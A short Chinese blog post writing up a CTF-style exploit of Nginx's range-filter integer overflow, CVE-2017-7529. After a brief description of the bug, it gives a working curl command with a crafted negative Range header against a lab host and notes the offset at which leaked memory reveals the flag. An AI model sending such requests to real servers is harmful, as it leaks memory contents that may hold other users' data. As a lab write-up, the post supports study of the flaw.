Nginx整数溢出漏洞 Writeup

Nginx整数溢出漏洞 CVE-2017-7529


漏洞描述

在 Nginx 的 range filter 中存在整数溢出漏洞,可以通过带有特殊构造的 range 的 HTTP 头的恶意请求引发这个整数溢出漏洞,并导致信息泄露。


  • payload:
    curl -i http://www.whalwl.site:8040/proxy/demo.png -r -17190,-9223372036854758618 > poc.txt
    偏移 605可读取flag
    17190=16585+605
    image

image

posted @ 2021-08-14 23:34  jzking121  阅读(681)  评论(0编辑  收藏  举报